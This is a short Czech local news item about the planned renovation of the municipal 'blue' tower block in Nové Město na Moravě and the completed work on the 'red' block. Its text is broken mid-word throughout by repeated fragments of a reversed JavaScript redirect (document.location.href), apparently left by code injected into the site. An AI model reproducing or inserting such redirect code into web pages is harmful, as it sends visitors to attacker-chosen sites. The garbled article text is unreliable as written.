Rainbow page separator

V Novém Městě chystají rekonstrukci „modrého“ věžáku

Neděle, 26. prosince 2021

Nové Měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to na Moravě / Za 200 tisíc korun nechá novoměstská radnice v příštím roce vypracovat projek[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovou dokumentaci na kompletní výměnu rozvodů v takzvaném modrém věžáku v ulici Tyršova. K realizaci stavebních prací v městském nájemním domě by výhledově mělo dojít o rok později, tedy v roce 2023. V rozpočtu města je mezi investičními akcemi zařazena taktéž rekonstrukce střechy by[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tového domu, a [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to včetně jejího zateplení a nových dešťových svodů.
V le[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tošním roce měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to zrealizovalo obnovu v pořadí druhého (červeného) ze tří věžových domů s nájemními byty v majetku města. Rekonstrukce probíhala několik měsíců, obnovou prošly vodovodní rozvody, kanalizace, dešťové svody, vzduchotechnika, ale také se změnil způsob vytápění by[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tového domu.